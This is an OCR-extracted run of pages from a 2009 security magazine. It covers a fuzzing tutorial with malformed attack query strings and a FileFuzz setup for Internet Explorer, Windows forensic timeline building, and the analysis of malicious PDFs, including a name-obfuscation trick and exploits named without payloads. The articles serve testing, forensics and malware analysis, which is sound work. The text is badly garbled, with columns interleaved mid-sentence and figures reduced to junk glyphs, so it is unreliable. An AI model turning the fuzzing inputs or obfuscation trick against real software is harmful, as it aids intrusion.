October 2006. hopping covert channels but also
• [DOD85] Department of Defence: Trusted Computer System Evaluation Criteria are less stable and provide a lower
(TCSEC, DoD 5200.28-STD), 1985. URL: http://csrc.nist.gov/publications/history/ bandwidth.
dod85.pd f
• [WEND07] Wendzel, S.: Protocol Hopping Covert Channels. An Idea and the
Implementation of a Protocol switching covert channel. URL: http://www.wendzel.de/
?sub=paper_phcc. A german text about this topic can be found in Hakin9 03/08.
Steffen Wendzel
• [YADALI08] F. Yarochkin, S.-Y. Dai, C.-H. Lin, Y. Huang, S.-Y. Kuo: Towards Adaptive Covert Steffen Wendzel is author of two German books about
Communication System, Dep. of Electrical Engineering, National Taiwan University, Linux and wrote also one about Network Security. He
2008. is about to finish his diploma degree in computer
science at the Kempten University of Applied Sciences,
Germany.

40 HAKIN9 6/2009
ATTACK
Fuzzing
TAMIN HANNA

Finding Vulnerabilities
with rand()
Difficulty
Traditionally, the search for security-related flaws in code took
place as follows: relevant sections of code were printed out, and
developers went over them trying to find as many potential issues
as possible. So-called code reviews tend to work quite well – but
happen rarely due to the immense cost involved.

F
ortunately, Moore's law comes to our added the following definition: Fuzzing is a
rescue: as human work became more technique in software development and more
expensive, CPU power became cheaper specifically software testing. It involves the
and cheaper...which has made brute-forcing sending of random data to the program's
of many tasks possible which were unfeasible external interface, and then observing the
before due to the prohibitive cost of the CPU time results.
needed. Thus, a valid question arises: why not use These definitions allow us to define the
randomization for finding security flaws – which is process as seen in Figure 1. Random data is
exactly what fuzzing tries to do. generated, and then fed into the program. Its
Michael Sutton has defined fuzzing as output is then observed to check for erroneous
follows: Fuzzing is the process of sending behavior; the process is repeated.
intentionally invalid data to a product in the As an example, let us assume that we are
hopes of triggering an error condition or fault. testing a web application. Its user interface works
These error conditions can lead to exploitable by transmitting GET queries. These interfaces are
vulnerabilities. extremely popular – the dialog below shows the
Michael Kirchner (known as churchy, fetching of the Wikipedia page about Bananas
member of the Team h4ck!nb3rg), furthermore (see Listing 1).

������

������ ���������
��������������
���� ������

WHAT YOU WILL �����


LEARN...
What fuzzing is

How fuzzing works ���������������


��������
WHAT YOU SHOULD
KNOW...
How to create non-trivial
applications Figure 1. Fuzzing with random data is easy to implement

42 HAKIN9 6/2009
FUZZING

Looking thoroughly at the example, The most complex way involves program to leak memor y, but continue
we see that the first line contains a URL the creation of a generator which working normally for now. Of course,
with a parameter. These parameters are itself understands the syntax of the the sending of a few thousand queries
encoded from user input by the browser, data being created: armed with this will lead to Denial of Service (DoS)
and can obviously be modified for fun understanding, the generator can conditions...
and profit. mangle various bits of the output. An Connecting the program to a
Let's assume that we have a fictive example is in Figure 3. debugger can give us further information:
application called tamsprogram. Param1 do some queries lead to abnormally high
is the name of the file which is to be Did we Bust It Yet? CPU or memory usage?
modified, while param2 is a number. The process above leads to a nice A popular example proving the
Running a packet sniffer to look at the amount of usable data and shows success and merits of the Fuzzing
communication gives us the following us if the app crashes... but does not process can be found in a product
string: get us any further information. This called protos-sip (http://www.ee.oulu.fi/
is bad: some errors can cause a research/ouspg/protos/testing/c07/sip/
http://tamsserver.com/tamsprogram.
php?param1=name&param2=232323

We then generate a large variety of


randomly altered queries (see Listing 2).
These are then sent to the server,
observing its results. If the server throws
a PHP or SQL error, a possible security
exception has been found – it can then
be analyzed further by professionals.

Generating Data
While this process sounds simple, getting
it up and running is not as easy as one
might think. The first major issue is the
generation of the test data. It can happen
using various methods – the simplest
involves the random editing of an existing
and valid file or input.
These random edits can work out,
but tend to be rather ineffective. Many
file formats contain compression or
CRC checks...the moment these are in
the reading routine, your fuzzing test's
code coverage is limited to the (usually
reliable) CRC and compression routines. Figure 2. Attack dictionary
A more sophisticated way involves
looking at the data, and then varying it
as needed. So-called attack dictionaries ������

can be used to simplify this process


– churchy presented the sample below: ������������
�������������� ������������� ���������
�������� ��������������
��������� �������� ������
�������������
(IMAGE)
P6041915.JPG �����
(/IMAGE)
���������������
Note how it contains some strings which ��������

cause SQL errors, and others which


are unhealthy for programs using the
standard library's printf call in an unsafe Figure 3. This fuzzer understands the input data, and can thus keep CRC checksums,
way. etc valid

6/2009 HAKIN9 43
ATTACK
): it sends a large bunch of malformed What Can Be Attacked? by modifying the amount or sequence
invalid INVITE queries to SIP phones. Obviously, applications which parse of parameters in calls.
Many of these then crash, waste CPU files are a prime target for fuzzing: However, the list of possible targets
cycles or leak memory...which can be generating fuxated files is easy, as is is almost infinite: for example, think about
exploited to annoy or harass the phone's opening them. The same can be said a program which pummels a complex
owner. for web ser vices, which can be attacked operating system call with random data.
Alternatively, think about GUI's, network
protocols, appliances or any other box
Listing 1. Fetching a page from Wikipedia
which exposes one or more interfaces.
CLIENT SENDS:

Point, Click, Root?


GET /w/index.php?title=Special%3ASearch&search=Banana&fulltext=Search HTTP/1.1 Let's end the theoretical part of this
Host: en.wikipedia.org analysis with a very important group of
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 statements.
Firefox/3.5
For black hats, Fuzzing is not a point,
click, root-style method which allows
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 inexperienced attackers to gain access to
Accept-Language: en-us,en;q=0.5
all kinds of service of product with ease.
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Fuzzing initially returns but a bug or weird
Keep-Alive: 300 thing in the product – exploiting it for fun
Connection: keep-alive and profit still requires understanding of
Referer: http://en.wikipedia.org/wiki/Banana
SQL injections, buffer overflows and other
classic techniques (DoS excluded to
SERVER RESPONDS: some extent).
HTTP/1.1 200 OK
Unfortunately, white hats and software
Cache-Control: private, max-age=0
Date: Thu, 25 Jun 2009 21:00:08 GMT developers planning to eliminate their
Expires: -1 testing cycles in entity via a fuzzer are
Content-Type: text/html; charset=ISO-8859-1 equally bad off. For them, Fuzzing is
Server: gws
ineffective, as it does not verify the entire
Content-Length: 0
DATA BELOW code base as is done in a practical
beta test. It furthermore can not check
Listing 2. Possible attack strings whether the program’s action is valid
http://tamsserver.com/tamsprogram.php?param1=name&param2=232323 – as an example, try to fuzz a program
http://tamsserver.com/tamsprogram.php?param1=2323&param2=232323 that deletes too many files in response to
http://tamsserver.com/tamsprogram.php?param1=name&param2=name a specific query.
http://tamsserver.com/tamsprogram.php?param2=232323
http://tamsserver.com/tamsprogram.php?param1=!%(
http://tamsserver.com/tamsprogram.php?param1=[LONG DATA] FileFuzz
http://tamsserver.com/tamsprogram.php?param2=[LARGE NUMBER] Various fuzzing frameworks exist which
http://tamsserver.com/tamsprogram.php?randomname=232323 allow users to fuzz-test specific products
http://tamsserver.com/tamsprogram.php?param1=name&param3=232323
with minimal effort – a decent list can
Listing 3. A FileFuzz installation be found at the web site of the Krakow
Labs (http://www.krakowlabs.com/
C:\Programme\iDefense\FileFuzz>dir
lof.html). Unfortunately, some products
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: 8428-8DFD are uncovered as of this writing
– if they read input files, FileFuzz
Verzeichnis von C:\Programme\iDefense\FileFuzz (http://www.securiteam.com/tools/
25.06.2009 23:17 <DIR> .
5PP051FGUE.html) can help out.
25.06.2009 23:17 <DIR> .. It generates a large amount of slightly
15.11.2006 15:48 98.304 crash.exe modified files out of an original one, and
15.11.2006 15:48 94.208 FileFuzz.exe
then invokes the application with each
15.11.2006 14:48 9.181 targets.xml
27.07.2005 19:18 3.482 targets.xsd one. Limited debugger support then allows
4 Datei(en) 205.175 Bytes you to get further information about the
2 Verzeichnis(se), 216.857.649.152 Bytes frei program.
FileFuzz lives off defined target
configurations, which must be set up in

44 HAKIN9 6/2009
FUZZING

a file called Targets.xml (see Listing 3).


Listing 4. Using FileFuzz to attack IE with garbled JPG files An example configuration is here – it
<test>
concerns the use of JPG files with Internet
<name>jpg – iexplore.exe</name> Explorer (see Listing 4).
- <file> One can clearly see that a source
<fileName>JPG</fileName>
file is needed – it is defined in the
<fileDescription>JPEG Image</fileDescription>
</file> source section. The app section deals
with the app which is to be fuzzed, and
the target section deals with the working
- <source>
<sourceFile>gradient.jpg</sourceFile>
directory.
<sourceDir>C:\WINDOWS\Help\Tours\htmlTour\</sourceDir> Once your configuration of choice has
</source> been set up, run FileFuzz.exe to get the
dialog shown in Figure 4.
- <app> Then switch to the execute tab and
<appName>iexplore.exe</appName> run your test case. Keep in mind that the
<appDescription>Internet Explorer</appDescription> paths displayed in the text files (and the
<appAction>open</appAction>
default configurations) sometimes are not
<appLaunch>"C:\Program Files\Internet Explorer\iexplore.exe"</appLaunch>
<appFlags>{0}</appFlags> correct…
</app>
- <target> Where to Look Next
<targetDir>c:\fuzz\jpg\</targetDir>
</target>
As outlined in the theoretical part of the
</test> article, FileFuzz tends to hit its limits when
CRC checks or encryption get involved.
In this case, a fuzzer which understands
the format of the files it generates is
needed.
Fortunately, a ready-made framework
called Sulley awaits Python-capable
Fuzzers. It can be programmed using
the Python programming language, and
makes for a very impressive tool if you can
do Python.

Conclusion
Fuzzing is not a silver bullet for white and/
or black-hat hackers. However, when used
correctly, it can significantly improve the
security and stability of the software which
it is set upon. Defending yourself against
Fuzzing-related attacks fortunately is quite
easy: with the proper verification of input
parameters…

Tamin Hanna
Tam Hanna has been in the mobile computing industry
since the days of the Palm IIIc. He develops applications
for handhelds/smartphones and runs for news sites
about mobile computing:
http://tamspalm.tamoggemon.com
http://tamspc.tamoggemon.com
http://tamss60.tamoggemon.com
http://tamswms.tamoggemon.com
If you have any questions regarding the article, email
author at:
Figure 4. FileFuzz running tamhan@tamoggemon.com

6/2009 HAKIN9 45
DEFENSE
HARLAN CARVEY

Windows Timeline
Analysis, Building a
Timeline, Part 2
Difficulty
The increase in sophistication of the Microsoft (MS) Windows
family of operating systems (Windows 2000, XP, 2003, Vista,
2008, and Windows 7) as well as that of cybercrime has long
required a corresponding increase or upgrade in response and
analysis techniques.

T
he traditional approach to forensic scenario in the practical to answer the same
timeline creation of extracting file basic questions that Lance presented.
modified, last accessed, and creation You’ll notice that the image is a 400 MB
times is proving to be increasingly insufficient EnCase evidence format image… download
for the analysis task at hand, particularly as it, and using FTK Imager (freely available from
additional sources (files on a Windows system, the AccessData web site) to re-image the
logs from network devices and packet captures, image in raw, dd-format. Once complete, the
etc.) provide a wealth of information for raw, dd-format image will be approximately 1.5
generating a more complete timeline of activity. GB in size. FTK Imager should also be used to
In addition, versions of the operating systems verify that the resulting image file contains a
beyond Windows 2003, as well as some MS recognizable file system, as illustrated in Figure 1.
applications (http://support.microsoft.com/
kb/961181) are no longer recording file last Setting up
accessed times by default, forcing analysts While you have the image opened in FTK Imager,
to seek other avenues to determine if a user you’ll need to extract a number of files that will be
accessed a file. incorporated into the timeline creation process.
You can do this easily by navigating through the
Windows Timeline Analysis Evidence Tree pane in FTK Imager, selecting the
WHAT YOU WILL As there are no commercial tools available, files that you’d like, and right-clicking on each
LEARN... timeline creation is largely a manual process. The file and choosing Export Files…, as illustrated in
What sources of timeline data
good news is that the tools needed to create a Figure 2.
are available on a Windows XP timeline are freely available and for the most part, When exporting the files from the image, you’ll
system
easy to use. want to use a directory structure as a means
How to construct a timeline In order to create a timeline of system of case management. For the purposes of this
of system and user activity for
analysis from an acquired image activity for analysis, we’ll need an acquired example, I’ve created a simple directory structure,
image from which to extract data. Lance as illustrated in Figure 3.
WHAT SHOULD YOU Mueller has done a wonderful job of providing In this case, the image itself (xp.img) is in
KNOW...
two forensic practical exercises, each with an the xp directory, and the Event Log and Registry
Basic information regarding
computer forensic examinations image of a Windows XP system. For this article, hive files from the Windows\system32\config
Basic information regarding file
we will be using the image available for the directory were exported from the image and
metadata (i.e., MAC times) first practical (http://www.forensickb.com/2008/ placed in the config directory. An initial review
How to run command line tools 01/forensic-practical.html), and following the of the image opened in FTK Imager indicated

46 HAKIN9 6/2009
WINDOWS TIMELINE ANALYSIS

that there appeared to be one primary FILETIME format, there are also times for processing. These events will then
user (Caster Troy) account, so the listed in Unix epoch time. Also, we be used to create our timeline for
NTUSER.DAT Registry hive file was also may not always be using just a single analysis. To create the events file, we
exported from the image. An index.dat Windows system to develop a timeline; run the bodyfile.pl Perl script (available
file was found within the Temporary we may include other sources, such in the Files section of the Win4n6
Internet Files\Content.IE5 as device syslogs or firewall logs, and Yahoo group), using the following
directory in the user profile, so that was the Unix epoch time format is more command line:
also extracted to the config directory, common.
as was the INFO2 file found within the The source field will be from where C:\tools>bodyfile.pl -s ACME-
Recycle Bin. A number of XP System within the system the data is derived; N6A1H8ZLJ1 -f d:\cases\xp\
Restore Points were found within the that is, the file system, Event Logs, etc.
image, as well, so those directories The system field will remain the same,
were extracted to the restore directory as we’re working with only one system.
for processing (see Figure 3). The user field may change depending
At this point, we have quite a bit upon how many users access the
of data available for creating an initial system, and the description field will
timeline, but this is just the starting point. provide us with a brief description of the
Before we begin building the timeline, event itself.
we need to revisit the final format of the
events. Timeline Creation
The first step in creating our timeline from
Fields of an Event the image we’ve acquired (in our case,
As discussed in the previous article, there downloaded) is to generate the initial file
are a number of sources of information system timeline information.
in an acquired image suitable for
inclusion in timeline, and ultimately used File System
for analysis. In order to maintain the An excellent tool for doing this is fls.exe
distinction between the various sources, from The SleuthKit (TSK) set of tools. The Figure 1. Practical image open in FTK
we’ll be using the five field TLN format command used to create a body file Imager
presented in the previous article. from our acquired image is:

Five Fields of an Event C:\tools>fls -f ntfs -m C:/ -p -r d:


\cases\xp\xp.img > d:\cases\xp\
• Time stamp, normalized to a 32-bit fls_bodyfile.txt
Unix epoch time
• Source – from where within the For more information on arguments
system the data was derived for fls.exe, see http://www.sleuthkit.org/ Figure 2. Exporting files in FTK Imager
• System – the system or host from sleuthkit/man/fls.html. For more
which the data was derived information on the format of the body
• User – the user associated with the file produced by fls.exe, see http:
event //wiki.sleuthkit.org/index.php?title=Body_
• Description – a concise description file.
of the event The result of the above command
is a body file that contains a list of
The time stamp field of the TLN format all of the files within the image (in
is the pivot point , if you will, and the this case, the image is of a logical
field from which the timeline itself will partition), including deleted files, as well
be developed. Throughout the timeline as their modified ( M ), last accessed
development, we will be normalizing ( A ), creation ( C ), and entr y modified ( E )
this field to 32-bit Unix epoch time, time stamps.
and maintaining that time in Universal Once we have the file system
Coordinated Time (UTC) format. We do body file, the next step is to create
this in part due to the fact that while our initial events file, which will hold all
Windows systems maintain a great of the events listed in the TLN format
number of time stamps in the Microsoft (discussed previously in this article) Figure 3. Example directory structure

6/2009 HAKIN9 47
DEFENSE
fls_bodyfile.txt > d:\cases\xp\ operators to tell the operating system to of the ProfileList Registry key, or parse
events.txt send that output to a file. As we’ve already the contents of the SAM hive file, and
created the events file, we want to append determine that the RID belongs to the
Taking a look at the syntax information the output of evtparse.pl to the file so we user of interest, Caster Troy. We can then
for bodyfile.pl (open the script in an use the >> operator. Once the above parse the INFO2 file we extracted from
editor, or simply type the name of the command has completed, repeat the that user’s Recycle Bin directory using
script at the command prompt), you’ll command for the Security and System recbin.pl, as follows:
see that the -s switch allows you to Event Logs.
enter the name of the server from The evtparse.pl Perl script parses C:\tools>recbin.pl -i d:\cases\xp\
which the data was collected, so that through Windows 2000, XP, and 2003 config\info2 -t >> d:\cases\xp\
the appropriate field in the TLN format Event Logs (.evt files) on a binary basis, events.txt
will be populated. In this case, the without making use of any Microsoft
system name (ACME-N6A1H8ZLJ1) was application programming interface Web Browser History
derived by running RegRipper against (API) functions. In many instances, Our earlier look into the acquired image
the System hive file extracted from the when attempting to view an Event Log indicated that one of the user’s had
image. As the file system is system-wide file exported from an acquired image, some Internet browsing history, so we
and not specific to a particular user, analysts will attempt to open the file extracted the appropriate index.dat
there is no need for an option to enter a through the Event Viewer, and will receive file from the image. We can extract
specific user name. an error message stating that the Event information from this file and add it
Log file is corrupted. Using tools like to our timeline in a two-step process,
Event Logs evtparse.pl, you can extract information the first step of which is to parse the
As we’ve already extracted the Event Log from within an Event Log file by parsing index.dat file using pasco.exe, available
files from within the image, we can go through file and locating the individual from the FoundStone.com web site.
ahead and the information within each event records. We can use the following command to
one to the events file, using the evtparse.pl Evtparse.pl does not take any extract the records
Perl script. In this case, the evtparse.pl additional arguments at the command
script takes only one argument (the full line, as the server and username fields C:\tools>pasco -d d:\cases\xp\config\
path and name of the Event Log file to be of the TLN format are populated by index.dat > d:\cases\xp\config\
parsed), and information extracted from the event index.txt
records themselves.
C:\tools>evtparse.pl d:\cases\xp\ We can then use the pasco.pl Perl script to
config\appevent.evt >> d: Recycle Bin parse though the index.txt file we created,
\cases\xp\events.txt When viewing the acquired image extracting the URL records, and adding
in FTK Imager, we noticed that there the appropriate system and user name
You should note that as the output of was a Recycle Bin for the user with fields to the TLN format via the following
evtparse.pl is sent to the console (a.k.a., relative identifier (RID) of 1004. Using command:
STDOUT), we need to use redirection RegRipper, we can extract the contents
C:\tools>pasco.pl -f d:\cases\xp\
config\index.txt -s ACME-N6A1H8ZLJ1
-u CasterTroy
>> d:\cases\xp\events.txt

Registry
Registry hive files contain a great deal of
time stamped information that may be
useful to our analysis. RegRipper v2.02
does not output its information in TLN
format (at the time of this writing, the
toolset is being updated to support that
functionality) but we can use the Timeline
Entry tool (tln.pl) to manually enter specific
items of interest into our timeline body file,
as illustrated in Figure 4.
Figure 4 shows the use of tln.pl
Figure 4. Using the TLN UI to add Registry data to the events file manually enter information from other

48 HAKIN9 6/2009
WINDOWS TIMELINE ANALYSIS

sources into to the timeline events system, we might find some useful While all possible sources of events
file. The date and time information is information with respect to the application for inclusion in the timeline have not been
entered into the appropriate fields in the prefetch files created by the operating presented, the article has presented a
MM/DD/YYYY HH:MM:SS format (as well system. fairly comprehensive approach to building
as UTC format). The analyst can then a timeline. At this point, the analysis of the
manually enter the source information, Creating the Timeline data presented in that timeline is up to
or select one of the choices from the Now that we’ve assembled a great deal of the examiner; she must determine what
dropdown list, as well as enter user and time stamped information into our events questions need to be answered and how
server information. Then the analyst file, we’re about ready to create our actual to use the timeline data to provide the
enters a description and selects the timeline. necessary answers.
events file to add the information to,
and clicks the Add button. Once the C:\tools>parse.pl –f d:\cases\xp\ Conclusion
information has been entered, the line events.txt > d:\cases\xp\timeline.txt Generating a timeline of activity from
added to the events file is displayed in a system or from multiple sources
the status bar at the bottom of the TLN The above command takes the contents can provide analysts with a significant
user inter face. of the events.txt file that we created, means of data reduction while at the
translates the time stamps into a human- same time optimizing analysis and
Restore Points understandable format, and sorts that reporting.
Earlier in this practical exercise, we entire list of events by date and time. The Generating a timeline in the manner
found that the acquired image contained resulting timeline.txt file contains all of the described in this article is largely a
several XP System Restore Points, sorted events, with the most recent event manual process, as there are currently
and we extracted those directories for listed first. In order to isolate a specific no commercial tools that automate the
analysis. range of dates within the events file and collection and presentation of the scope
display a shortened timeline, you can use of data available.
C:\tools>rp.pl -d d:\cases\xp\ the -r switch to enter a date range, as However, the benefits of creating
restore –t >> d:\cases\xp\events.txt follows: timelines in this manner far outweigh the
effort required to generate the timeline,
The rp.pl Perl script accesses each C:\tools>parse.pl -f d:\cases\xp\ and timeline analysis as described in
Restore Point directory, locates the rp.log events.txt -r 01/28/2008-01/31/2008 > this article will undoubtedly become
file (if there is one available), and parses d:\cases\xp\timeline_short.txt a standard component of forensic
it for the date and time that the Restore investigations.
Point was created, as well as the reason Dates are entered at the command line In addition, mini-timelines using only
for it being created. The -t switch tells the in the MM/DD/YYYY format, and the above a limited number of sources (for example,
script to format the output in TLN format, command line lists all events from 00:00: only Event Log data) can be quickly
and as you can see from the command 00 on 28 January 2008 through 23:59:59 created and analyzed to provide answers
line, we’ve added the information to our on 31 January 2008. to questions fairly quickly.
events.txt file.
Summary
Prefetch Files This article has walked you through the
As the image we’re working with was basic steps for building a timeline for
acquired from a Windows XP SP 1 computer forensic analysis.

On the ‘Net
• http://www.sleuthkit.org/ – The SleuthKit (TSK) tools, by Brian Carrier
• http://tech.groups.yahoo.com/group/win4n6/ – Win4n6 Yahoo Group
• http://www.regripper.net/ – The tool for Windows Registry Analysis
• http://www.forensicswiki.org/wiki/Timeline_Analysis_Bibliography – ForensicWiki Timeline Harlan Carvey
Harlan Carvey is an incident responder and computer
Analysis Bibliography forensic analyst based in the Metro DC area. He has
• http://www.foundstone.com/us/resources-free-tools.asp – FoundStone Network Security considerable experience speaking at conferences
free tools (Pasco) on computer forensic and incident response topics,
and is the author of several books, including Windows
Forensics and Incident Recovery (AWL, 2004), Windows
References Forensic Analysis (Syngress, 2007), and is a co-author
for Perl Scripting for Windows Security (Syngress, 2007).
Windows Forensic Analysis, Second Edition (Syngress, 2009) The second edition of his Windows Forensic Analysis
was published in June, 2009 and is currently ranked #1
in computer forensic book sales on Amazon.com.

6/2009 HAKIN9 49
DEFENSE
Anatomy of
DIDIER STEVENS

Malicious PDF
Documents, Part 2
Difficulty

What tools do you need to analyze a malicious PDF document?


You could use Acrobat, but then you run the risk of infecting your
machine when opening the PDF document with Acrobat.

I
n this second article on malicious PDF the risk of exploitation of certain types of bugs,
documents, I introduce some tools to help you like buffer overflows.
with your analysis.

A virus lab with its tools


Malware analysis must be done in a safe
environment, a virus lab. The virus lab must help
you to:

• prevent the malware from executing


• contain the malware in the virus lab, should it
ever execute

Limiting your virus lab with a command-line


interface has some advantages. You will not
double-click a malicious file by accident, and you
eliminate the risk that a GUI triggers the malware
by accessing data in the malicious files.
As almost all in-the-wild PDF malware
targets the Windows platform and uses
shellcode as payload, analyzing these
malicious documents in a Linux environment
strongly reduces the risk of unwanted infection.
Win32 shellcode doesn't execute in a Linux Figure 1. PDFiD output
WHAT YOU WILL environment.
LEARN...
Using commercial or open-source software
Analyzing malicious PDF
documents with custom tools that aims to support a full set of the PDF language
comes with a risk: it could contain vulnerabilities
WHAT SHOULD YOU that the malicious PDF author tries to exploit.
KNOW... That's why I decided to develop my own tools
The structure of PDF documents, to analyze PDF documents. Implementing them
as explained in the first part of
this article series in Python would provide portability and reduce Figure 2. PDFiD output with obfuscation counter

50 HAKIN9 6/2009
MALICIOUS PDF DOCUMENTS

Python runs on many platforms: (Windows executables), PDFiD tries to When you pass PDFiD a file to
Windows, Linux, OSX, ... I even have a identify PDF files. analyze (test.pdf), it reports on what it
Python interpreter installed on my Nokia You should use it first to triage PDF finds in the document.
Mobile. And as a scripted language, it documents. It will produce a report to First, it tells you which version of PDFiD
brings you flexibility (provided you know a help you decide if the PDF file is possibly you're using and the name of the file you
bit of Python): you can adapt the program malicious or not. instructed it to analyze. The second line is
on the fly, while you are analyzing PDFiD is essentially a specialized the %PDF header, reporting the version of
malware. string scanner. It has almost no the PDF language used by the document.
understanding of the PDF language From then on, the report tells you
PDF Name Obfuscation (that's why it's invulnerable to the the frequency of several keywords and
About a year ago, I described a technique exploits that plague Acrobat), it just names.
to obfuscate PDF documents: PDF name looks for certain keywords and uses With the number of times the
obfuscation. Because this technique is canonicalization to deal with PDF name keywords obj, endobj, stream and
starting to get used by malware authors obfuscation. endstream appear in the document,
to evade anti-virus, I included support for Let's take a look at the output before I you can get an idea of how many
it in my tools. continue explaining the features of PDFiD, indirect objects are contained in the
Consider the following indirect see Figure 1 now. document.
object:

7 0 obj
<<
/Type /Action
/S /JavaScript
/JS (app.fs.isFullScreen = true;)
>>
endobj

The tokens preceded by a / (slash) in


the dictionary are called Names in the
official PDF description. Names are case-
sensitive. The characters used in a Name
are limited to a specific set, but since
PDF specification version 1.2, a lexical
convention has been added to represent
a character with its hexadecimal ANSI-
code, like this #XX .
This allows us to rewrite the /
JavaScript name in several ways, for
example:

/Java#53cript

Pattern matching algorithms must


take into account these different Figure 3. Using pdf-parser to find Annotation Actions (/AA)
representations to successfully match a
pattern. A standard way to deal with this is
canonicalization. First, the token is reduced
to a canonical form (e.g. replace all #xx
representations by the character they
stand for), and second, pattern matching
is performed on the canonical form.

PDFiD
The first tool I want to introduce is
PDFiD. Like PeiD tries to identify PE-files Figure 4. Analyzing indirect object 14

6/2009 HAKIN9 51
DEFENSE
further obfuscating the content of the it could hide scripts and/or actions.
PDF document. PDF encryption has been /JBIG2Decode is also suspicious.
popular to deliver SPAM messages via PDF. Benign PDF documents can also exhibit
/ObjStm is an important type of these features, but if you're already unsure
object for our analysis. Object streams about the origins of a PDF document, the
(abbreviated: ObjStm) are indirect objects report of PDFiD will confirm your suspicion.
that contain other indirect objects! PDFiD is also running on VirusTotal.
Figure 5. Searching for JavaScript
By compressing the indirect objects If you send a file for analysis to http:
contained in an object stream, you hide all //www.virustotal.com, the PDFiD report
the keywords we want to analyze. So if you will be included for PDF documents. The
find object streams in a PDF document, command-line options of PDFiD are:
/JavaScript could be hiding inside it and
PDFiD will not report it (we will later see • version – show program's version
how to handle this). number and exit
/JS and /JavaScript indicate that • h , – help – show this help message
the PDF document contains JavaScript. and exit
Figure 6. The stream contained in object
The absence of these names doesn't • s, – scan – scan the given directory
34 is compressed
necessarily mean that no JavaScript is • a , – all – display all the names
More than one occurrence of xref, contained in the PDF document, they could • e , – extra – display extra data, like
trailer and startxref could indicate the use be hiding in object streams (/ObjStm ). dates
of incremental updates. /RichMedia is like /JavaScript, but • f, – force – force the scan of the file,
Following these keywords, we find the indicates the presence of ActionScript (Flash). even without proper %PDF header
statistics of names important to our analysis. The presence of /AA , /OpenAction • d , – disarm – disable JavaScript and
/Page gives an indication of the or /AcroForm indicates an action to be auto launch
number of pages in the document. performed, for example, executing a script
I've observed that most malicious PDF (/JavaScript) when the PDF document is The scan options allows you to scan all the
documents have only a single page. opened (/OpenAction). files contained in a folder (and its sub folders).
Numbers between parentheses /JBIG2Decode indicates the presence The reports are written to file pdfid.log.
indicate name obfuscation and tell you of the JBIG2 image format, which Option – all forces PDFiD to display
how many instances of that name are has recently been exploited due to a all /Names it finds in the PDF document.
obfuscated (see Figure 2). vulnerability in Adobe Reader. If you want more information, use
In this example, the name / How to interpret this report? If you see option – extra . This will display dates it
JavaScript occurs once and is a script (/JS /JavaScript /RichMedia) finds in the PDF document (from meta-
obfuscated (the exact way it was and an action (/AA/OpenAction / data and embedded files), and calculate
obfuscated is not reported, what you see AcroForm ), then assume the PDF is the entropy of the PDF document. The
is the canonical form). malicious and flag it for further analysis. entropy of a byte sequence is a measure
/Encrypt indicates that the content The presence of object streams for its randomness. The value varies
of the PDF document is encrypted, thus (/objStm ) requires further analysis, as between 0 and 8, 8 indicates the highest
level of entropy. You should find a high
entropy inside streams and a low entropy
outside streams. If you find high entropy
Figure 7. Decompressing the stream of object 34 outside streams, then this is an indication
that the PDF document is malformed and
could embed a large malicious payload
(which doesn't require downloading from
the Internet).
Option – force makes PDFiD parse
the document, even if it doesn't find a valid
PDF header. We will use this later.
Disarm is a neat trick to disable
JavaScript: it toggles the case of all
/JavaScript names and saves this
new version of the PDF document with
the mention disarmed. Because the PDF
Figure 8. JavaScript exploiting collectEmailInfo vulnerability language is case-sensitive and most

52 HAKIN9 6/2009
MALICIOUS PDF DOCUMENTS

pdf-parser is used, and the code is not compressed


pdf-parser has more knowledge of the or obfuscated. So let's take on a bit more
internal structure of PDF documents challenging sample.
(for example, it can parse indirect Triaging this sample (mal2.pdf ) with
objects). It scans the PDF document PDFiD tells us it contains JavaScript. So
from beginning to end and displays let's search for indirect objects with the
information about the PDF elements it word JavaScript (see Figure 5).
encounters. According to this, the JavaScript itself
But instead of giving a lengthy is in indirect object 34 (see Figure 6).
description of all its features, let's just This time, we have a stream object.
start with analyzing some malicious PDF The content of the stream is compressed
documents. and has to be decompressed with the
When we identify our first sample FlateDecode method, so let's apply this
(mal1.pdf ) with PDFiD, we notice it contains filter (see Figure 7).
an annotation action (/AA ). So let's start This will display the JavaScript code
by using pdf-parser to take a closer look found in the compressed stream. By
at this annotation. We use pdf-parser with default, pdf-parser doesn't output binary
the –search option to display all indirect data when you filter streams, it only outputs
objects that contain the /AA name (the readable data. You have to use the –raw
Figure 9. Object Streams counted by search option is not case-sensitive and option to force it to output binary data.
PDFiD canonicalizes the PDF content) (Figure 3). Here is part of the script we extracted
PDF readers silently ignore names they Indirect object 6 (a page) contains an (see Figure 8).
don't understand, changing the case annotation action that references indirect collectEmailInfo is a method with
of /JavaScript effectively disables object 14 (14 0 R). a vulnerability that is being exploited in this
JavaScript in the PDF document. To select object 14, we use the –object malicious PDF document.
To summarize: PDFiD will not tell option (see Figure 4). If we want to know exactly what the
you if a PDF document is malicious or We immediately notice the mailto: and exploit does, we have to analyze the
not, this remains your call. The PDFiD cmd.exe in the text. This PDF document complete JavaScript, which is outside of
report provides you with info to make an exploits the PDF/IE7 mailto vulnerability. the scope of this article. In a nutshell: the
informed decision. If it's suspicions to you, This sample is very simple. No JavaScript JavaScript does a heap-spray of shellcode.
don't open it. If you really need to know
what's inside, I have another tool to help
you: pdf-parser. Figure 10. Decompress Object Streams

a d v e r t i s e m e n t
DEFENSE
You can isolate the JavaScript statements For our last example (mal3.pdf ), let's take a 9 contains a vulnerability that is being exploit
that generate this shellcode, execute it sample exploiting one of the latest exploits: in this sample. So let's take a look with
with a JavaScript interpreter, and then a PDF/Flash exploit. The latest version of PDFiD (see Figure 9).
disassemble or debug the shellcode. On my the PDF format supports embedding Flash This PDF documents contains no signs
blog, I've a modified JavaScript interpreter objects (ActionScript) inside PDF documents. of possible malicious intend. But to be sure,
(SpiderMonkey) that will help you with this. The ActionScript interpreter of Adobe Reader we have to check what's hiding inside the
object streams (/ObjStm ). So let's select
and extract the content of these object
streams with pdf-parser (see Figure 10).
Although the output is not compressed
anymore, reading this is no so obvious:
see Figure 11. So let's pipe this output of
pdf-parser through PDFiD (because the
header is missing, we need to use the
–force option) (see Figure 12).
And now the /RichMedia names are
revealed, indicating that this PDF document
contains embedded Flash objects.
If we want to know exactly what the
exploit does, we have to analyze the
ActionScript, which is outside of the scope
of this article. In a nutshell: search for the
Figure 11. Raw decompressed Object Streams embedded swf files associated with the
